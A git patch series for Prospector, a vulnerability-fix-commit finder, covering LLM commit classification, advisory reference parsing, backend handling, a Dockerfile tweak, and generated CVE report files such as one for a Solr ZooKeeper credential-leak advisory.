From 55e14205415c8cea188e555f5484535d5444465f Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 22 Jul 2024 13:26:13 +0000 Subject: [PATCH 001/130] send one request to update security relevance of a batch of commits (instead of sending a request for each individual commit) adds LLM statistics to statistics object and Prospector reports Captures execution time at the level above the LLMService function, so that even if LLM function doesn't get executed anymore (because the information is found in db), the time of the db retrieval is still measured. --- prospector/rules/rules.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/prospector/rules/rules.py b/prospector/rules/rules.py index 204e309b9..d74b9ee87 100644 --- a/prospector/rules/rules.py +++ b/prospector/rules/rules.py @@ -460,6 +460,8 @@ def apply( return candidate.security_relevant + return candidate.security_relevant + except requests.exceptions.RequestException as e: error_type = type(e).__name__ print( From 19d16fe3f33df2a04d45dd5ff7c8ace231ec7e7d Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 30 Jul 2024 07:22:07 +0000 Subject: [PATCH 002/130] Reduces throwing errors when the LLM returns a verbose answer in commit classification. Now if there is 'true' or 'false' in the answer string, it is returned as True and False respectively, instead of checking for certain output formats --- prospector/llm/llm_service.py | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/prospector/llm/llm_service.py b/prospector/llm/llm_service.py index 86dbaffbc..c88e81895 100644 --- a/prospector/llm/llm_service.py +++ b/prospector/llm/llm_service.py @@ -116,17 +116,9 @@ def classify_commit( except Exception as e: raise RuntimeError(f"Prompt-model chain could not be invoked: {e}") - if is_relevant in [ - "True", - "ANSWER:True", - "```ANSWER:True```", - ]: + if "True" in is_relevant: return True - elif is_relevant in [ - "False", - "ANSWER:False", - "```ANSWER:False```", - ]: + elif "False" in is_relevant: return False else: raise RuntimeError( From 5af05010b21e05f0280b736cf70b2aa1370a921a Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 9 Aug 2024 08:42:05 +0000 Subject: [PATCH 003/130] cleaner error logging when git command fails --- prospector/git/git.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/prospector/git/git.py b/prospector/git/git.py index ef317fc37..adf6eb853 100644 --- a/prospector/git/git.py +++ b/prospector/git/git.py @@ -311,6 +311,8 @@ def parse_git_output(self, raw: List[str]) -> Dict[str, RawCommit]: return commits def find_commits_for_twin_lookups(self, commit_id): + """Finds all relevant commits around the given commit wihin a time + window of 10 days. Search is narrowed if too many commits are found.""" # Using both author date and commit date we should cover all cases. try: commit_timestamp_a = self.get_timestamp(commit_id, "a") @@ -329,8 +331,8 @@ def find_commits_for_twin_lookups(self, commit_id): return dict() - except Exception: - logger.error("Git command failed, cannot get commits", exc_info=True) + except Exception as e: + logger.error(f"Git command failed, cannot get commits: {e}") return dict() From 552509b651a63ce8f167b47b152283b5945dfd1a Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 09:52:19 +0000 Subject: [PATCH 004/130] Advisory References: commit makes sure that only commits refrenced in the advisory with a commit hash are treated as 'fixing commits', and not if the references is eg. 'commit::master' --- prospector/core/prospector.py | 12 ++++--- prospector/datamodel/advisory.py | 55 +++++++++++++++++++++++++------- 2 files changed, 51 insertions(+), 16 deletions(-) diff --git a/prospector/core/prospector.py b/prospector/core/prospector.py index 589fb516d..8185b38c1 100644 --- a/prospector/core/prospector.py +++ b/prospector/core/prospector.py @@ -113,7 +113,9 @@ def prospector( # noqa: C901 ) sys.exit(1) - fixing_commit = advisory_record.get_fixing_commit() + commits_in_advisory_references = ( + advisory_record.get_commits_in_advisory_references() + ) # print(advisory_record.references) # obtain a repository object repository = Git(repository_url, git_cache) @@ -131,10 +133,12 @@ def prospector( # noqa: C901 candidates: Dict[str, RawCommit] = dict() - if len(fixing_commit) > 0: - candidates = get_commits_no_tags(repository, fixing_commit) + if len(commits_in_advisory_references) > 0: + candidates = get_commits_no_tags( + repository, commits_in_advisory_references + ) if len(candidates) > 0 and any( - [c for c in candidates if c in fixing_commit] + [c for c in candidates if c in commits_in_advisory_references] ): console.print("Fixing commit found in the advisory references\n") advisory_record.has_fixing_commit = True diff --git a/prospector/datamodel/advisory.py b/prospector/datamodel/advisory.py index 709b14139..b66874c82 100644 --- a/prospector/datamodel/advisory.py +++ b/prospector/datamodel/advisory.py @@ -131,7 +131,9 @@ def fetch_references(self): def parse_references_from_third_party(self): """Parse the references from third party sites""" - for ref in self.search_references_debian() + self.search_references_redhat(): + for ref in ( + self.search_references_debian() + self.search_references_redhat() + ): # self.references[ref] += 2 self.references[self.extract_hashes(ref)] += 2 @@ -167,7 +169,9 @@ def parse_advisory(self, data): # ) self.versions = { "affected": [ - item.get("versionEndIncluding", item.get("versionStartIncluding")) + item.get( + "versionEndIncluding", item.get("versionStartIncluding") + ) for item in data["configurations"][0]["nodes"][0]["cpeMatch"] ], # TODO: can return to tuples "fixed": [ @@ -178,14 +182,27 @@ def parse_advisory(self, data): self.versions["affected"] = [ v for v in self.versions["affected"] if v is not None ] - self.versions["fixed"] = [v for v in self.versions["fixed"] if v is not None] + self.versions["fixed"] = [ + v for v in self.versions["fixed"] if v is not None + ] + + def get_commits_in_advisory_references(self) -> List[str]: + """Processes the advisory's references to extract commit IDs if + present. Only keeps the five most important ones. - def get_fixing_commit(self) -> List[str]: + Returns: + A list of references to a commit. + """ self.references = dict( - sorted(self.references.items(), key=lambda item: item[1], reverse=True) + sorted( + self.references.items(), key=lambda item: item[1], reverse=True + ) ) limit = 0 - while len([r for r in self.references.keys() if r.startswith("commit::")]) > 5: + while ( + len([r for r in self.references.keys() if r.startswith("commit::")]) + > 5 + ): self.references = { k: v for k, v in self.references.items() @@ -193,7 +210,12 @@ def get_fixing_commit(self) -> List[str]: } limit += 1 - return [ref.split("::")[1] for ref in self.references if "commit::" in ref] + return [ + ref.split("::")[1] + for ref in self.references + if "commit::" in ref + and ref.split("::")[1] not in ["master", "main"] + ] def search_references_debian(self) -> List[str]: url = "https://security-tracker.debian.org/tracker/" @@ -221,7 +243,9 @@ def search_references_redhat(self) -> List[str]: return [] - def extract_hashes(self, reference: str, filter: bool = False) -> str | None: + def extract_hashes( + self, reference: str, filter: bool = False + ) -> str | None: if bool(re.search(r"a=commit;", reference)): return "commit::" + re.search(r";h=(\w{6,40})", reference).group(1) @@ -258,12 +282,15 @@ def parse_advisory_2(self, details, metadata): for field, key in timestamp_fields.items(): timestamp = metadata.get(key) setattr( - self, field, int(isoparse(timestamp).timestamp()) if timestamp else None + self, + field, + int(isoparse(timestamp).timestamp()) if timestamp else None, ) if not self.description: self.description = details["descriptions"][0]["value"] self.references = defaultdict( - int, {self.extract_hashes(r["url"]): 2 for r in details["references"]} + int, + {self.extract_hashes(r["url"]): 2 for r in details["references"]}, ) @@ -290,7 +317,9 @@ def get_from_nvd(cve_id: str): headers = {"apiKey": NVD_API_KEY} if NVD_API_KEY else None params = {"cveId": cve_id} - response = requests.get(NVD_REST_ENDPOINT, headers=headers, params=params) + response = requests.get( + NVD_REST_ENDPOINT, headers=headers, params=params + ) if response.status_code != 200: return None @@ -314,7 +343,9 @@ def is_url_allowed(url: str) -> bool: return False -def get_from_local(vuln_id: str, nvd_rest_endpoint: str = LOCAL_NVD_REST_ENDPOINT): +def get_from_local( + vuln_id: str, nvd_rest_endpoint: str = LOCAL_NVD_REST_ENDPOINT +): try: response = requests.get(nvd_rest_endpoint + vuln_id) if response.status_code != 200: From 3be03fb2729a1b0e064bee04508d1c4d182bc17d Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 07:58:01 +0000 Subject: [PATCH 005/130] fixes bug when extracting text from Jira Refs --- prospector/util/http.py | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/prospector/util/http.py b/prospector/util/http.py index 443100686..feac446c0 100644 --- a/prospector/util/http.py +++ b/prospector/util/http.py @@ -106,17 +106,13 @@ def get_from_xml(id: str): try: params = {"field": {"description", "summary", "comments"}} - # response = requests.get( - # f"https://issues.apache.org/jira/si/jira.issueviews:issue-xml/{id}/{id}.xml", - # params=params, - # ) - # xml_data = BeautifulSoup(response.text, features="html.parser") xml_data = fetch_url( f"https://issues.apache.org/jira/si/jira.issueviews:issue-xml/{id}/{id}.xml", params=params, + extract_text=False, ) item = xml_data.find("item") - if item is None: + if item is None or item == -1: return "" relevant_data = [ itm.text for itm in item.findAll(["description", "summary", "comments"]) From c7dbd7ffe64e72d1acf66b68a813030c70cbff49 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 30 Jul 2024 15:00:58 +0000 Subject: [PATCH 006/130] removes 'dubious ownership' error when trying to access git repositories with a different user' --- prospector/docker/worker/Dockerfile | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/prospector/docker/worker/Dockerfile b/prospector/docker/worker/Dockerfile index e5421220c..fd3b9863f 100644 --- a/prospector/docker/worker/Dockerfile +++ b/prospector/docker/worker/Dockerfile @@ -73,4 +73,11 @@ VOLUME [ "/data_sources/reports" ] RUN chmod +x /usr/local/bin/start_rq_worker.sh #CMD tail -f /dev/null + +# Create directory for gitcache and run git config command to avoid 'dubious ownership' error +RUN mkdir -p /tmp/gitcache && \ + cd /tmp/gitcache && \ + git config --global --add safe.directory '*' + + ENTRYPOINT ["/usr/local/bin/start_rq_worker.sh"] From ba72de19fefe7564e79a8fea21a9eae7e4bb46e4 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 08:32:43 +0000 Subject: [PATCH 007/130] prints error to console instead of crashing at None, -1 returned from Prospector --- prospector/cli/main.py | 8 +++++++- prospector/core/prospector.py | 8 +++----- 2 files changed, 10 insertions(+), 6 deletions(-) diff --git a/prospector/cli/main.py b/prospector/cli/main.py index 633754cdb..41b5661c8 100644 --- a/prospector/cli/main.py +++ b/prospector/cli/main.py @@ -107,7 +107,13 @@ def main(argv): # noqa: C901 "enabled_rules": config.enabled_rules, } - results, advisory_record = prospector(**params) + try: + results, advisory_record = prospector(**params) + except Exception as e: + ConsoleWriter.print( + f"Prospector function couldn't return successfully with {config.vuln_id}: {e}\n" + ) + return if config.preprocess_only: return diff --git a/prospector/core/prospector.py b/prospector/core/prospector.py index 8185b38c1..67f0f554c 100644 --- a/prospector/core/prospector.py +++ b/prospector/core/prospector.py @@ -174,10 +174,8 @@ def prospector( # noqa: C901 f"Number of candidates exceeds {limit_candidates}, aborting." ) - ConsoleWriter.print( - f"Candidates limitlimit exceeded: {len(candidates)}." - ) - return None, len(candidates) + ConsoleWriter.print(f"Candidates limit exceeded: {len(candidates)}.") + raise Exception(f"Candidate limit exceeded: {len(candidates)}.") with ExecutionTimer( core_statistics.sub_collection("commit preprocessing") @@ -232,7 +230,7 @@ def prospector( # noqa: C901 elapsed_time = time.time() - start_time if elapsed_time > 1800: logger.error("Processing timeout") - return None, len(candidates) + raise Exception("Processing timeout") else: writer.print("\nAll commits found in the backend") From 91087290e5c8b2667c8fe61e25fdfeaccd34d655 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 26 Aug 2024 15:03:40 +0000 Subject: [PATCH 008/130] [FIX] makes sure that commit classification information is only retrieved when using backend is optional or always --- prospector/core/prospector.py | 27 +++++++++++++++++++++++---- prospector/rules/rules.py | 31 ++++++++++++++++--------------- 2 files changed, 39 insertions(+), 19 deletions(-) diff --git a/prospector/core/prospector.py b/prospector/core/prospector.py index 67f0f554c..dfab128b5 100644 --- a/prospector/core/prospector.py +++ b/prospector/core/prospector.py @@ -246,15 +246,26 @@ def prospector( # noqa: C901 ): save_or_update_processed_commits(backend_address, payload) else: - logger.warning("Preprocessed commits are not being sent to backend") + logger.warning( + "Preprocessed commits are not being sent to backend (after phase 1)" + ) ranked_candidates = evaluate_commits( - preprocessed_commits, advisory_record, backend_address, enabled_rules + preprocessed_commits, + advisory_record, + use_backend, + backend_address, + enabled_rules, ) # Save outcome of security relevance to DB (Phase 2 Rule) payload = [c.to_dict() for c in ranked_candidates[:NUM_COMMITS_PHASE_2]] - save_or_update_processed_commits(backend_address, payload) + if len(payload) > 0 and use_backend != USE_BACKEND_NEVER: + save_or_update_processed_commits(backend_address, payload) + else: + logger.warning( + "Preprocessed commits are not being sent to backend (after phase 2)" + ) # ConsoleWriter.print("Commit ranking and aggregation...") ranked_candidates = remove_twins(ranked_candidates) @@ -298,6 +309,7 @@ def filter(commits: Dict[str, RawCommit]) -> Dict[str, RawCommit]: def evaluate_commits( commits: List[Commit], advisory: AdvisoryRecord, + use_backend: str, backend_address: str, enabled_rules: List[str], ) -> List[Commit]: @@ -318,8 +330,15 @@ def evaluate_commits( """ with ExecutionTimer(core_statistics.sub_collection("candidates analysis")): with ConsoleWriter("Candidate analysis") as _: + # Pass True to the rules module if the backend is being used, False + # otherwise (needed to decide whether to update the database) + use_backend = use_backend != USE_BACKEND_NEVER ranked_commits = apply_rules( - commits, advisory, backend_address, enabled_rules=enabled_rules + commits, + advisory, + use_backend, + backend_address, + enabled_rules=enabled_rules, ) return ranked_commits diff --git a/prospector/rules/rules.py b/prospector/rules/rules.py index d74b9ee87..eb1c6a78d 100644 --- a/prospector/rules/rules.py +++ b/prospector/rules/rules.py @@ -57,6 +57,7 @@ def get_id(self): def apply_rules( candidates: List[Commit], advisory_record: AdvisoryRecord, + use_backend: bool, backend_address: str, enabled_rules: List[str] = [], ) -> List[Commit]: @@ -95,7 +96,7 @@ def apply_rules( for candidate in candidates[:NUM_COMMITS_PHASE_2]: for rule in phase_2_rules: - if rule.apply(candidate, backend_address): + if rule.apply(candidate, use_backend, backend_address): counter.increment("matches") candidate.add_match(rule.as_dict()) candidate.compute_relevance() @@ -433,6 +434,7 @@ class CommitIsSecurityRelevant(Rule): def apply( self, candidate: Commit, + use_backend: bool, backend_address: str, ) -> bool: @@ -441,18 +443,19 @@ def apply( ): # Check if this commit is already in the database try: - r = requests.get( - f"{backend_address}/commits/{candidate.repository}", - params={"commit_id": candidate.commit_id}, - timeout=10, - ) - r.raise_for_status() - commit_data = r.json()[0] - - is_security_relevant = commit_data.get("security_relevant") - if is_security_relevant is not None: - candidate.security_relevant = is_security_relevant - return is_security_relevant + if use_backend: + r = requests.get( + f"{backend_address}/commits/{candidate.repository}", + params={"commit_id": candidate.commit_id}, + timeout=10, + ) + r.raise_for_status() + commit_data = r.json()[0] + + is_security_relevant = commit_data.get("security_relevant") + if is_security_relevant is not None: + candidate.security_relevant = is_security_relevant + return is_security_relevant candidate.security_relevant = LLMService().classify_commit( candidate.diff, candidate.repository, candidate.message @@ -460,8 +463,6 @@ def apply( return candidate.security_relevant - return candidate.security_relevant - except requests.exceptions.RequestException as e: error_type = type(e).__name__ print( From a57769b481a73aa0183e6922adab70b0e85fe5c9 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 14:09:10 +0000 Subject: [PATCH 009/130] sorts and cleans up gitignore --- ..._5806f368-d4f2-44cb-84ba-c5513bb9c3de.html | 300 + ..._5806f368-d4f2-44cb-84ba-c5513bb9c3de.json | 123 + ..._5b183fbd-ef84-47a0-8190-03dbf8a9a97d.html | 5477 +++ ..._5b183fbd-ef84-47a0-8190-03dbf8a9a97d.json | 2157 + ..._dadd7e2d-e33b-4fb8-85af-5850284379d9.html | 353 + ..._dadd7e2d-e33b-4fb8-85af-5850284379d9.json | 144 + ..._f6df4f22-2cce-453a-80a8-615cc55b8664.html | 32435 ++++++++++++++++ ..._f6df4f22-2cce-453a-80a8-615cc55b8664.json | 20090 ++++++++++ ..._08be8d94-00cf-4453-81ef-4d48d7ebf7ec.html | 16695 ++++++++ ..._08be8d94-00cf-4453-81ef-4d48d7ebf7ec.json | 5841 +++ ..._c20f61cc-bfe0-46b2-9ea8-514f2c20e33c.html | 9552 +++++ ..._c20f61cc-bfe0-46b2-9ea8-514f2c20e33c.json | 2402 ++ ..._1c52c1c9-aabf-4a15-8a28-7516cb2f2321.html | 8564 ++++ ..._1c52c1c9-aabf-4a15-8a28-7516cb2f2321.json | 2333 ++ prospector/pipeline/reports/report.html | 0 prospector/pipeline/reports/report1.html | 4518 +++ 16 files changed, 110984 insertions(+) create mode 100644 prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.html create mode 100644 prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.json create mode 100644 prospector/pipeline/reports/CVE-2023-50298_5b183fbd-ef84-47a0-8190-03dbf8a9a97d.html create mode 100644 prospector/pipeline/reports/CVE-2023-50298_5b183fbd-ef84-47a0-8190-03dbf8a9a97d.json create mode 100644 prospector/pipeline/reports/CVE-2024-2216_dadd7e2d-e33b-4fb8-85af-5850284379d9.html create mode 100644 prospector/pipeline/reports/CVE-2024-2216_dadd7e2d-e33b-4fb8-85af-5850284379d9.json create mode 100644 prospector/pipeline/reports/CVE-2024-23897_f6df4f22-2cce-453a-80a8-615cc55b8664.html create mode 100644 prospector/pipeline/reports/CVE-2024-23897_f6df4f22-2cce-453a-80a8-615cc55b8664.json create mode 100644 prospector/pipeline/reports/CVE-2024-39810_08be8d94-00cf-4453-81ef-4d48d7ebf7ec.html create mode 100644 prospector/pipeline/reports/CVE-2024-39810_08be8d94-00cf-4453-81ef-4d48d7ebf7ec.json create mode 100644 prospector/pipeline/reports/CVE-2024-41674_c20f61cc-bfe0-46b2-9ea8-514f2c20e33c.html create mode 100644 prospector/pipeline/reports/CVE-2024-41674_c20f61cc-bfe0-46b2-9ea8-514f2c20e33c.json create mode 100644 prospector/pipeline/reports/CVE-2024-42472_1c52c1c9-aabf-4a15-8a28-7516cb2f2321.html create mode 100644 prospector/pipeline/reports/CVE-2024-42472_1c52c1c9-aabf-4a15-8a28-7516cb2f2321.json create mode 100644 prospector/pipeline/reports/report.html create mode 100644 prospector/pipeline/reports/report1.html diff --git a/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.html b/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.html new file mode 100644 index 000000000..979fd8aba --- /dev/null +++ b/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.html @@ -0,0 +1,300 @@ + + + + + + + + + + + + + + + + Prospector Report + + + + +
+
+
+ + + +
+

Advisory Record

+ CVE-2019-16572
+

Jenkins Weibo Plugin 1.0.1 and earlier stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.

+ + + +
Other relevant keywords
+

+ +

  • access
  • + + +
  • configuration
  • + + +
  • credential
  • + + +
  • file
  • + + +
  • jenkins
  • + + +
  • master
  • + + +
  • plugin
  • + + +
  • store
  • + + +
  • system
  • + + +
  • user
  • + + +
  • view
  • + + +
  • weibo
  • + + +

    + +
    + + + +
    +
    +
    Execution Statistics
    + +
    +
    +
    • core
      • retrieval of commit candidates
        • execution time = 0.002072 seconds
      • git
        • git
          • Git
            • create_commits
              • execution time is a list of numbers
                • average = 0.0009302739053964615 seconds
                • deviation = 0.001300225008205017 seconds
                • median = 0.0009302739053964615 seconds
                • count = 2
                • sum = 0.001860547810792923 seconds
      • candidates = 0 commits
      • commit preprocessing
        • execution time = 0.0001336 seconds
      • candidates analysis
        • execution time = 0.02646 seconds
      • execution time = 1.808 seconds
    • rules
      • active = 17 rules
      • matches = 0 matches
    • LLM
      • repository_url
        • execution time = 1.429 seconds
    +
    +
    + +
    + +
    +
    +
    +
    +

    Prospector Report

    +
    + + +
    +
    + +
    +
    +
    +
    +
    + + + + + + + + + + \ No newline at end of file diff --git a/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.json b/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.json new file mode 100644 index 000000000..d4e4a4dbf --- /dev/null +++ b/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.json @@ -0,0 +1,123 @@ +{ + "parameters": { + "vulnerability_id": "CVE-2019-16572", + "repository_url": "https://github.com/jenkinsci/jenkins", + "version_interval": "None:1.0.2", + "use_backend": "always", + "backend_address": "http://backend:8000", + "git_cache": "/data/gitcache", + "limit_candidates": 2000, + "use_llm_repository_url": true, + "enabled_rules": [ + "VULN_ID_IN_MESSAGE", + "XREF_BUG", + "XREF_GH", + "COMMIT_IN_REFERENCE", + "VULN_ID_IN_LINKED_ISSUE", + "CHANGES_RELEVANT_FILES", + "CHANGES_RELEVANT_CODE", + "RELEVANT_WORDS_IN_MESSAGE", + "ADV_KEYWORDS_IN_FILES", + "ADV_KEYWORDS_IN_MSG", + "SEC_KEYWORDS_IN_MESSAGE", + "SEC_KEYWORDS_IN_LINKED_GH", + "SEC_KEYWORDS_IN_LINKED_BUG", + "GITHUB_ISSUE_IN_MESSAGE", + "BUG_IN_MESSAGE", + "COMMIT_HAS_TWINS", + "COMMIT_IS_SECURITY_RELEVANT" + ] + }, + "advisory_record": { + "cve_id": "CVE-2019-16572", + "description": "Jenkins Weibo Plugin 1.0.1 and earlier stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", + "reserved_timestamp": 1568937600, + "published_timestamp": 1576593655, + "updated_timestamp": 1723232643, + "repository_url": null, + "references": { + "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1597": 2, + "http://www.openwall.com/lists/oss-security/2019/12/17/1": 2 + }, + "affected_products": [ + "Plugin", + "Weibo", + "Jenkins", + "Jenkins Weibo Plugin" + ], + "versions": { + "lessThanOrEqual": "1.0.1", + "status": "affected", + "version": "unspecified", + "versionType": "custom" + }, + "files": [], + "keywords": [ + "store", + "credential", + "system", + "access", + "user", + "plugin", + "view", + "file", + "master", + "configuration", + "weibo", + "jenkins" + ], + "files_extension": [], + "has_fixing_commit": false + }, + "commits": [], + "processing_statistics": { + "core": { + "retrieval of commit candidates": { + "execution time": [ + 0.0020722728222608566 + ] + }, + "git": { + "git": { + "Git": { + "create_commits": { + "execution time": [ + 0.0018496718257665634, + 1.0875985026359558e-05 + ] + } + } + } + }, + "candidates": 0, + "commit preprocessing": { + "execution time": [ + 0.00013364851474761963 + ] + }, + "candidates analysis": { + "execution time": [ + 0.026456749066710472 + ] + }, + "execution time": [ + 1.8081965018063784 + ] + }, + "rules": { + "active": [ + 17 + ], + "matches": [ + 0 + ] + }, + "LLM": { + "repository_url": { + "execution time": [ + 1.4294230211526155 + ] + } + } + } +} \ No newline at end of file diff --git a/prospector/pipeline/reports/CVE-2023-50298_5b183fbd-ef84-47a0-8190-03dbf8a9a97d.html b/prospector/pipeline/reports/CVE-2023-50298_5b183fbd-ef84-47a0-8190-03dbf8a9a97d.html new file mode 100644 index 000000000..3fd6526ab --- /dev/null +++ b/prospector/pipeline/reports/CVE-2023-50298_5b183fbd-ef84-47a0-8190-03dbf8a9a97d.html @@ -0,0 +1,5477 @@ + + + + + + + + + + + + + + + + Prospector Report + + + + +
    +
    +
    + + +

    Filters

    +

    + Use the slider to filter out lower relevance scores and the button to collapse or expand all the commits. +

    + +
    +
    + +
    +
    + +
    +
    + + + + +
    +

    Advisory Record

    + CVE-2023-50298
    +

    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. + +Solr Streaming Expressions allows users to extract data from other Solr Clouds, using a "zkHost" parameter. +When original SolrCloud is setup to use ZooKeeper credentials and ACLs, they will be sent to whatever "zkHost" the user provides. +An attacker could setup a server to mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs and extracts the sensitive information, +then send a streaming expression using the mock server's address in "zkHost". +Streaming Expressions are exposed via the "/streaming" handler, with "read" permissions. + +Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. +From these versions on, only zkHost values that have the same server address (regardless of chroot), will use the given ZooKeeper credentials and ACLs when connecting. + +

    + + +
    Possible relevant files/methods
    +

    +

      + +
    • ACLs
    • + +
    • Solr
    • + +
    • SolrCloud
    • + +
    • This
    • + +
    • zkHost
    • + +
    • ZooKeeper
    • + +
    +

    + + +
    Other relevant keywords
    +

    + +

  • accept
  • + + +
  • actor
  • + + +
  • address
  • + + +
  • affect
  • + + +
  • allow
  • + + +
  • apache
  • + + +
  • attacker
  • + + +
  • chroot
  • + + +
  • clouds
  • + + +
  • connect
  • + + +
  • credential
  • + + +
  • datum
  • + + +
  • expose
  • + + +
  • exposure
  • + + +
  • expression
  • + + +
  • expressions
  • + + +
  • extract
  • + + +
  • give
  • + + +
  • handler
  • + + +
  • have
  • + + +
  • information
  • + + +
  • issue
  • + + +
  • parameter
  • + + +
  • permission
  • + + +
  • provide
  • + + +
  • read
  • + + +
  • recommend
  • + + +
  • request
  • + + +
  • send
  • + + +
  • sensitive
  • + + +
  • server
  • + + +
  • setup
  • + + +
  • solr
  • + + +
  • solrcloud
  • + + +
  • stream
  • + + +
  • streaming
  • + + +
  • unauthorized
  • + + +
  • upgrade
  • + + +
  • user
  • + + +
  • value
  • + + +
  • version
  • + + +
  • vulnerability
  • + + +
  • zookeeper
  • + + +

    + +
    + + + +
    +
    +
    Execution Statistics
    + +
    +
    +
    • core
      • retrieval of commit candidates
        • execution time = 0.02454 seconds
      • git
        • git
          • Git
            • create_commits
              • execution time = 0.02434 seconds
      • candidates = 41 commits
      • commit preprocessing
        • execution time = 0.05642 seconds
      • candidates analysis
        • execution time = 0.3947 seconds
      • save commits to backend
        • execution time = 0.03555 seconds
      • execution time = 2.898 seconds
    • rules
      • active = 17 rules
      • matches = 167 matches
    • LLM
      • repository_url
        • execution time = 1.664 seconds
      • commit_classification
        • execution time is a list of numbers
          • average = 0.016033098846673966 seconds
          • deviation = 0.0008028324026679636 seconds
          • median = 0.01598429959267378 seconds
          • count = 10
          • sum = 0.16033098846673965 seconds
    +
    +
    + +
    + +
    +
    +
    +
    +

    Prospector Report

    +
    + + +
    +
    + +
    + +
    +
    +
    +
    +
    + SOLR-17098: Only use ZK ACLs for default ZK Host (cherry picked from... + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 98 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + COMMIT_IS_SECURITY_RELEVANT + + XREF_BUG + + RELEVANT_WORDS_IN_MESSAGE + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + SEC_KEYWORDS_IN_LINKED_BUG + + ADV_KEYWORDS_IN_FILES + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 61c956c426b2cfb85ccef55d1afca4335eacd269 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      +
    • + +
    • +
      The commit and the advisory (including referenced pages) mention the same bug tracking ticket: SOLR-17098
      +
    • + +
    • +
      The commit message contains some relevant words: ACLs
      +
    • + +
    • +
      The commit modifies code containing relevant filename or methods: This, ZooKeeper, Solr, ACLs, zkHost
      +
    • + +
    • +
      The commit changes some relevant files: solr/solrj/src/java/org/apache/solr/client/solrj/io/SolrClientCache.java, solr/solr-ref-guide/src/stream-decorator-reference.adoc, solr/core/src/java/org/apache/solr/core/CoreContainer.java, solr/solrj/src/java/org/apache/solr/client/solrj/impl/CloudHttp2SolrClient.java, solr/solrj/src/java/org/apache/solr/common/cloud/ZkStateReader.java, solr/solrj/src/test-files/solrj/solr/solr.xml, solr/solrj/src/java/org/apache/solr/common/cloud/SolrZkClient.java, solr/solr-ref-guide/src/stream-source-reference.adoc, solr/solrj/src/java/org/apache/solr/client/solrj/impl/ZkClientClusterStateProvider.java, solr/solrj/src/java/org/apache/solr/client/solrj/impl/CloudSolrClient.java
      +
    • + +
    • +
      The bug tracking ticket SOLR-17098 contains some security-related terms: security
      +
    • + +
    • +
      An advisory keyword is contained in the changed files: read, stream, provide, clouds
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-17098
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      SOLR-17098: Only use ZK ACLs for default ZK Host (cherry picked from commit e2bf1f434aad873fbb24c21d46ac00e888806d98)
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + solr/core/src/java/org/apache/solr/core/CoreContainer.java + + solr/solr-ref-guide/src/stream-decorator-reference.adoc + + solr/solr-ref-guide/src/stream-source-reference.adoc + + solr/solrj/src/java/org/apache/solr/client/solrj/impl/CloudHttp2SolrClient.java + + solr/solrj/src/java/org/apache/solr/client/solrj/impl/CloudSolrClient.java + + solr/solrj/src/java/org/apache/solr/client/solrj/impl/ZkClientClusterStateProvider.java + + solr/solrj/src/java/org/apache/solr/client/solrj/io/SolrClientCache.java + + solr/solrj/src/java/org/apache/solr/common/cloud/SolrZkClient.java + + solr/solrj/src/java/org/apache/solr/common/cloud/ZkStateReader.java + + solr/solrj/src/test-files/solrj/solr/solr.xml + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + SOLR-16777: Fix for Schema Designer blindly trusting potentially... + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 94 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + COMMIT_IS_SECURITY_RELEVANT + + XREF_BUG + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + SEC_KEYWORDS_IN_LINKED_BUG + + SEC_KEYWORDS_IN_MESSAGE + + ADV_KEYWORDS_IN_FILES + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 4ac1d59918c250bffb09899572bd92054cee063a +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      +
    • + +
    • +
      The commit and the advisory (including referenced pages) mention the same bug tracking ticket: SOLR-16777
